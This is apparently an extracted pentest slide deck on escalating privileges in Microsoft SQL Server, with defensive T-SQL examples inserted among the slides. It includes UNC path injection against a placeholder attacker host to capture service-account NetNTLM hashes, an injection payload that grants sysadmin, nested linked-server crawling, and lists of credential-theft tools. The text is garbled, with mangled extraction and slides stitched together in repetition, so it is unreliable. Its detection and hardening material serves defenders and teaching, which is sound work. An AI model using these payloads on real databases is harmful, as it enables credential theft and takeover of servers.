BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016
https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It’s self descriptive
Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges
OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach            | 2000 | 2005 | 2008 | 2012 | 2014 | 2016
LSA Secrets         |  x   |  x   |  x   |  x   |  x   |  x
Local Administrator |  x   |  x   |      |      |      |
LocalSystem         |  x   |  x   |  x   |      |      |
Process Migration   |  x   |  x   |  x   |  x   |  x   |  x
Token Stealing      |  x   |  x   |  x   |  x   |  x   |  x
Single User Mode    |      |  x   |  x   |  x   |  x   |  x
Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options
Approach | Common Tools
Access as Local Administrator | Management Studio, sqlcmd, and other native SQL client tools
Access as LocalSystem | Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets | Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process | Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process | Metasploit Incognito, Invoke-TokenManipulation
Single User Mode | DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
[Figure: Leveraging MS SQL Database Links (built up over four slides). Same network as above: Internet, DMZ, Intranet; LRA, HVA, LVA, ADS; ports 80 and 443 into the DMZ, ports 1433 and 1434 between SQL Servers. Attacker "Captain Evil" (PURE EVIL):
  1. SQL injection against DB1 (LVA)
  2. A chain of links out of DB1, one labelled "DB Link with Least Privileges" and one labelled "DB Link with SA account", ends at the HVA: execute SQL queries and local commands on database servers via nested linked servers
Key: HVA = High Value Application; LVA = Low Value Application]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we've seen
• The max number of hops we've seen is 12
• The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
• Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
• Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/

Function                  Description
Get-SQLServerLink         Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl    Crawls linked servers and supports SQL query and OS command execution
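The T-SQL below is an added example, not code from the deck or from PowerUpSQL. It shows the three things a practitioner does around links: inventory them and see who each caller becomes on the far end (the data Get-SQLServerLink reports), walk one hop and then a nested second hop the way a crawler does, and reconfigure a link so it stops handing every caller a fixed privileged remote login. The link names SQLSERVER2 and SQLSERVER3 and the logins ReportingUser and ReportReader are assumptions.

```sql
-- 1. Inventory: which links exist and who you become on the far end.
--    local_login = '<all logins>' together with a fixed remote_name (often sa) means every
--    login on this server, public-only ones included, rides the link as that remote account.
SELECT  s.name                    AS link_name,
        s.data_source,
        s.is_data_access_enabled, -- required for OPENQUERY
        s.is_rpc_out_enabled,     -- required for EXEC ... AT link (e.g. xp_cmdshell on the far end)
        CASE WHEN ll.local_principal_id = 0 THEN '<all logins>' ELSE lp.name END AS local_login,
        ll.uses_self_credential,  -- 1 = the caller's own Windows credential is passed through
        ll.remote_name            -- fixed remote login used for the mapped local login(s)
FROM    sys.servers              AS s
JOIN    sys.linked_logins        AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals  AS lp ON lp.principal_id = ll.local_principal_id
WHERE   s.is_linked = 1;

-- 2. One hop: who am I on SQLSERVER2, and which links does it have (the candidate next hops)?
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT @@SERVERNAME AS remote_server, SYSTEM_USER AS remote_login,
            IS_SRVROLEMEMBER(''sysadmin'') AS remote_is_sysadmin');
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT name, is_rpc_out_enabled FROM sys.servers WHERE is_linked = 1');

-- 3. Two hops: the same query nested one level deeper. Every level of nesting doubles the
--    quotes again ('' becomes ''''), which is why crawlers build the statement programmatically.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT * FROM OPENQUERY([SQLSERVER3],
        ''SELECT @@SERVERNAME AS remote_server, SYSTEM_USER AS remote_login,
                 IS_SRVROLEMEMBER(''''sysadmin'''') AS remote_is_sysadmin'')');

-- 4. Least-privilege link: drop the catch-all mapping, map one local login to one
--    low-privilege remote login, and disable RPC OUT so stored procedures such as
--    xp_cmdshell cannot be executed through the link.
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'SQLSERVER2', @locallogin = NULL;  -- NULL = the default "all logins" mapping
EXEC sp_addlinkedsrvlogin  @rmtsrvname = N'SQLSERVER2', @useself = 'FALSE',
                           @locallogin = N'ReportingUser',
                           @rmtuser = N'ReportReader', @rmtpassword = N'<strong password>';
EXEC sp_serveroption @server = N'SQLSERVER2', @optname = N'rpc out', @optvalue = N'false';
```

After step 4, any login without an explicit mapping gets a login failure when it touches the link, which is the intended outcome; re-run step 1 to confirm the '<all logins>' row is gone. Step 3 is exactly what Get-SQLServerLinkCrawl automates, including the quote doubling per hop.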
Escalating Privileges: UNC Path Injection
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands:
    BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
    RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
  The server connects to the named share and authenticates to it as its service account.
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016: https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008

Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can obtain the SQL Server service account's Net-NTLM hash (a challenge/response that can be cracked offline or relayed) by default.
But who really has PUBLIC role access? Oh yeah, a ton of domain users.

Escalating Privileges: DEMO
Get-SQLServiceAccountPwHashes
…what? It's self-descriptive.
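As an added example (not from the deck or PowerUpSQL), here is the defender side for an instance that cannot be patched: confirm the build, then capture who submits BACKUP/RESTORE statements containing a UNC path and who triggers "Cannot open backup device" errors (error 3201), with the login, host and statement attached. The session name unc_backup_probe and the event file name are assumptions.

```sql
-- 1. Which build is this? MS16-131 covers 2012-2016 (major versions 11-13).
--    Lower major versions have no fix and rely on detection plus network controls
--    (block outbound SMB/445 from database hosts).
SELECT  SERVERPROPERTY('ProductVersion') AS product_version,
        SERVERPROPERTY('ProductLevel')   AS product_level,
        CASE WHEN CAST(PARSENAME(CAST(SERVERPROPERTY('ProductVersion') AS nvarchar(128)), 4) AS int) < 11
             THEN 'no patch available: rely on detection and egress filtering'
             ELSE 'verify MS16-131 or a later cumulative update is applied' END AS note;
GO

-- 2. Extended Events: (a) any batch from a non-system session that contains BACKUP or
--    RESTORE followed by a UNC path, (b) every error 3201, which is what the engine
--    raises after the SMB connection attempt fails. Both carry the caller's identity.
CREATE EVENT SESSION [unc_backup_probe] ON SERVER
ADD EVENT sqlserver.sql_batch_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname, sqlserver.client_app_name)
    WHERE (sqlserver.is_system = 0
           AND (sqlserver.like_i_sql_unicode_string([batch_text], N'%BACKUP%\\%')
             OR sqlserver.like_i_sql_unicode_string([batch_text], N'%RESTORE%\\%')))),
ADD EVENT sqlserver.error_reported (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname, sqlserver.client_app_name, sqlserver.sql_text)
    WHERE ([error_number] = 3201))
ADD TARGET package0.event_file (SET filename = N'unc_backup_probe');
GO
ALTER EVENT SESSION [unc_backup_probe] ON SERVER STATE = START;
GO

-- 3. Read back what was captured. The 3201 message text contains the device path the
--    caller supplied, i.e. the attacker's host or IP.
;WITH raw AS (
    SELECT CAST(event_data AS xml) AS x
    FROM   sys.fn_xe_file_target_read_file('unc_backup_probe*.xel', NULL, NULL, NULL)
)
SELECT  x.value('(event/@name)[1]', 'sysname')                                       AS event_name,
        x.value('(event/@timestamp)[1]', 'datetime2')                                AS utc_time,
        x.value('(event/action[@name="server_principal_name"]/value)[1]', 'sysname')  AS login_name,
        x.value('(event/action[@name="client_hostname"]/value)[1]', 'sysname')        AS client_host,
        COALESCE(x.value('(event/data[@name="batch_text"]/value)[1]', 'nvarchar(max)'),
                 x.value('(event/data[@name="message"]/value)[1]',    'nvarchar(max)')) AS detail
FROM    raw
ORDER BY utc_time;
```

A BACKUP or RESTORE pointing at a UNC path from a login that is not a sysadmin and does not own a backup job is the signal; legitimate backups to network shares come from a small, known set of accounts and can be allow-listed in the query.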
Escalating Privileges: OS Admin to SysAdmin

Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin

Approach               2000  2005  2008  2012  2014  2016
LSA Secrets             x     x     x     x     x     x
Local Administrator     x     x
LocalSystem             x     x     x
Process Migration       x     x     x     x     x     x
Token Stealing          x     x     x     x     x     x
Single User Mode              x     x     x     x     x

Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options:

Approach                                                        Common Tools
Access as Local Administrator                                   Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                           PsExec, accessibility-options debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets    Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process     Metasploit, Empire, Python, PowerShell, C/C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process      Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                                DBATools
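As an added example (not from the deck or PowerUpSQL), a T-SQL audit run on one instance that covers both the shared service account problem described earlier and the OS-admin paths in the version table above: does the engine run as a domain account that may be reused across instances, are BUILTIN\Administrators or NT AUTHORITY\SYSTEM still sysadmin on this build, and is the OS-command surface already open. sys.dm_server_services requires SQL Server 2008 R2 SP1 or later; the classification strings are this example's own.

```sql
-- 1. Who does the engine run as? A DOMAIN\name that is not a virtual or built-in account
--    is the candidate for reuse across instances. Compare service_account across the
--    estate: identical values mean sysadmin on one box is sysadmin on all of them.
SELECT  servicename,
        service_account,
        CASE
            WHEN service_account = 'LocalSystem'
              OR service_account LIKE 'NT Service\%'
              OR service_account LIKE 'NT AUTHORITY\%'
              OR service_account LIKE 'BUILTIN\%'
              OR service_account LIKE CAST(SERVERPROPERTY('MachineName') AS sysname) + '\%'
                THEN 'local or virtual account'
            WHEN service_account LIKE '%\%'
                THEN 'domain account: check for reuse on other instances and for Domain Admin membership'
            ELSE 'other'
        END AS assessment
FROM    sys.dm_server_services
WHERE   servicename LIKE 'SQL Server (%';

-- 2. Who is sysadmin? Flag the two principals the version table is about: if either
--    holds sysadmin, any local administrator (or anyone who can become SYSTEM) already is.
SELECT  p.name,
        p.type_desc,
        p.is_disabled,
        CASE WHEN p.name IN ('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM')
             THEN 'legacy default: local admins / SYSTEM are sysadmin'
             ELSE '' END AS note
FROM    sys.server_role_members AS rm
JOIN    sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN    sys.server_principals   AS p ON p.principal_id = rm.member_principal_id
WHERE   r.name = 'sysadmin'
ORDER BY p.name;

-- 3. Is the OS-command surface already enabled? value_in_use = 1 means xp_cmdshell (and
--    friends) run immediately for any sysadmin, including one obtained by the paths above.
SELECT  name, value_in_use
FROM    sys.configurations
WHERE   name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled');
```

Run this on every instance and group the results by service_account: a single domain account appearing on dozens of rows is the "one account to rule them all" finding, and a sysadmin row for the domain service account itself is what lets a compromise on one host carry over to the others.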
Common Post Exploitation Activities

Post Exploitation Overview
1. Establish persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry & file auto-runs, tasks, services, etc.
2. Identify sensitive data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate sensitive data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
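As an added example (not from the deck or PowerUpSQL), a T-SQL hunt for the SQL Server layer persistence listed in item 1: startup procedures, server and database DDL/logon triggers, Agent jobs with OS-level steps, and recently modified code. It is meant to be run by a responder with sysadmin rights on the instance; the 30-day window is an assumption.

```sql
USE master;
GO
-- 1. Startup procedures: executed as sysadmin every time the service starts.
SELECT  SCHEMA_NAME(p.schema_id) + '.' + p.name AS startup_procedure,
        p.create_date, p.modify_date,
        OBJECT_DEFINITION(p.object_id)          AS definition
FROM    sys.procedures AS p
WHERE   OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1;

-- 2. Server-level triggers (LOGON / server DDL) plus database-level DDL triggers in the
--    current database. Run the second half in each user database as well.
SELECT  'server'   AS scope, name, type_desc, is_disabled, create_date, modify_date
FROM    sys.server_triggers
UNION ALL
SELECT  'database' AS scope, name, type_desc, is_disabled, create_date, modify_date
FROM    sys.triggers
WHERE   parent_class = 0;   -- 0 = database (DDL) trigger, not a table trigger

-- 3. Agent jobs whose steps leave the SQL layer or call command-execution procedures.
SELECT  j.name                    AS job_name,
        j.enabled,
        SUSER_SNAME(j.owner_sid)  AS owner,
        s.step_id, s.subsystem, s.command,
        j.date_modified
FROM    msdb.dbo.sysjobs     AS j
JOIN    msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE   s.subsystem IN ('CmdExec', 'PowerShell', 'ActiveScripting')
   OR   s.command LIKE '%xp_cmdshell%'
   OR   s.command LIKE '%sp_OACreate%'
ORDER BY j.date_modified DESC;

-- 4. "Modified code": user procedures, functions and triggers changed recently in the
--    current database. Diff the definition against source control or a known-good backup.
SELECT  SCHEMA_NAME(o.schema_id) + '.' + o.name AS object_name,
        o.type_desc, o.create_date, o.modify_date,
        m.definition
FROM    sys.objects     AS o
JOIN    sys.sql_modules AS m ON m.object_id = o.object_id
WHERE   o.is_ms_shipped = 0
  AND   o.modify_date >= DATEADD(DAY, -30, SYSDATETIME())
ORDER BY o.modify_date DESC;
```

Startup procedures and server triggers are the two locations an attacker needs sysadmin to plant and that survive a password reset, so an empty result for sections 1 and 2 is the first thing to establish; job and module modify dates then narrow the timeline.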
3. Take the first 48 hex characters (24 bytes) of the full SID: that prefix is the domain SID, and the trailing 4 bytes are the RID (here 0x00000200 = 512).
   Full SID   = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
   Domain SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure in the security context of its owner rather than the caller (another user, and, in a TRUSTWORTHY database, effectively another login)
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires the database to be configured as TRUSTWORTHY for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as its owner
• DB_OWNER role can impersonate the actual database owner

    USE MyAppDb
    GO
    CREATE PROCEDURE sp_escalate_me
    WITH EXECUTE AS OWNER
    AS
    EXEC sp_addsrvrolemember 'MyAppUser', 'sysadmin'
    GO

SYSADMIN is often the OWNER (and the database must be TRUSTWORTHY for the owner's server-level rights to apply, as for any server-scoped action taken under EXECUTE AS OWNER)
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as TRUSTWORTHY for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
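The seven steps above carried through end to end, as an added example that is not from the deck or PowerUpSQL. The procedure needs VIEW SERVER STATE, which the application user lacks; instead of EXECUTE AS OWNER plus TRUSTWORTHY, the procedure is signed and only the certificate login receives that one permission. The database MyAppDb, the user AppUser, the certificate and login names, the export path and the password placeholder are all assumptions.

```sql
USE MyAppDb;
GO
-- Step 1: the procedure. Without VIEW SERVER STATE a caller only sees its own session here.
CREATE PROCEDURE dbo.usp_active_requests
AS
    SELECT session_id, status, command, DB_NAME(database_id) AS database_name
    FROM   sys.dm_exec_requests
    WHERE  session_id > 50;
GO
-- Steps 2 and 3: a master key and a signing certificate in the application database.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = N'<strong password>';
CREATE CERTIFICATE ProcSigningCert WITH SUBJECT = N'Signs dbo.usp_active_requests';
GO
-- Step 4: copy the public part of the certificate into master and create a login from it.
--    The login cannot be used to connect; it exists only to hold permissions. Assumed path.
BACKUP CERTIFICATE ProcSigningCert TO FILE = N'C:\SqlSecure\ProcSigningCert.cer';
GO
USE master;
GO
CREATE CERTIFICATE ProcSigningCert FROM FILE = N'C:\SqlSecure\ProcSigningCert.cer';
CREATE LOGIN ProcSigningLogin FROM CERTIFICATE ProcSigningCert;
-- Step 5: the single permission the procedure gains. No sysadmin, no TRUSTWORTHY.
GRANT VIEW SERVER STATE TO ProcSigningLogin;
GO
USE MyAppDb;
GO
-- Step 6: sign the procedure. The signature is what carries the login's permission.
ADD SIGNATURE TO dbo.usp_active_requests BY CERTIFICATE ProcSigningCert;
GO
-- Step 7: let the application user run it.
GRANT EXECUTE ON dbo.usp_active_requests TO AppUser;
GO
-- Verify which modules are signed and by what. ALTER PROCEDURE silently drops the
-- signature, so re-run ADD SIGNATURE after every change and re-check here.
SELECT  OBJECT_SCHEMA_NAME(cp.major_id) + '.' + OBJECT_NAME(cp.major_id) AS signed_module,
        c.name AS certificate_name
FROM    sys.crypt_properties AS cp
JOIN    sys.certificates     AS c ON c.thumbprint = cp.thumbprint;
```

Delete the exported .cer file once it has been imported into master. The granularity the deck refers to is visible in step 5: the permission set is whatever is granted to ProcSigningLogin, rather than everything the database owner happens to hold.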
Escalating Privileges: Impersonation
SQL Injection Example

    CREATE PROCEDURE sp_sqli2
        @DbName varchar(max)
    WITH EXECUTE AS OWNER
    AS
    BEGIN
        DECLARE @query AS varchar(max)
        SET @query = 'SELECT name FROM master..sysdatabases WHERE name LIKE ''%' + @DbName + '%'' OR name = ''tempdb'''
        EXECUTE(@query)
    END
    GO
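As an added example (not from the deck), the call that turns sp_sqli2 into a sysadmin grant when its owner is a sysadmin and the database is TRUSTWORTHY, followed by two versions that keep EXECUTE AS OWNER but remove the injection: the caller's value is compared against, never executed. MyAppUser is assumed to be the caller's login.

```sql
-- Why the original matters: under EXECUTE AS OWNER the injected statement runs as the owner.
-- This value closes the LIKE pattern, appends a second statement and comments out the rest.
EXEC dbo.sp_sqli2 @DbName = 'master'';EXEC master..sp_addsrvrolemember ''MyAppUser'',''sysadmin'';--';
-- Dynamic SQL that the original builds from it:
--   SELECT name FROM master..sysdatabases WHERE name LIKE '%master';
--   EXEC master..sp_addsrvrolemember 'MyAppUser','sysadmin';--%' OR name='tempdb'

-- Fix 1: no dynamic SQL at all. The parameter is data and cannot change the statement.
CREATE PROCEDURE dbo.sp_sqli2_static
    @DbName sysname
WITH EXECUTE AS OWNER
AS
BEGIN
    SELECT name
    FROM   master.sys.databases
    WHERE  name LIKE '%' + @DbName + '%' OR name = 'tempdb';
END
GO

-- Fix 2: when dynamic SQL is genuinely needed, pass user values as sp_executesql
-- parameters (and wrap any user-supplied identifiers in QUOTENAME).
CREATE PROCEDURE dbo.sp_sqli2_dynamic
    @DbName sysname
WITH EXECUTE AS OWNER
AS
BEGIN
    DECLARE @sql nvarchar(max) =
        N'SELECT name FROM master.sys.databases WHERE name LIKE N''%'' + @pattern + N''%'' OR name = N''tempdb'';';
    EXEC sys.sp_executesql @sql, N'@pattern sysname', @pattern = @DbName;
END
GO

-- The same payload against the fixed procedures is now just an odd LIKE pattern that matches nothing.
EXEC dbo.sp_sqli2_static  @DbName = 'master'';EXEC master..sp_addsrvrolemember ''MyAppUser'',''sysadmin'';--';
EXEC dbo.sp_sqli2_dynamic @DbName = 'master'';EXEC master..sp_addsrvrolemember ''MyAppUser'',''sysadmin'';--';
```

The characters % and _ in @DbName still act as LIKE wildcards in both fixes, which affects which rows come back but can no longer change what the statement does; escape them if that matters. The deck's own recommendation, replacing EXECUTE AS OWNER with a signed procedure, applies on top of this fix and removes the TRUSTWORTHY dependency as well.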
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
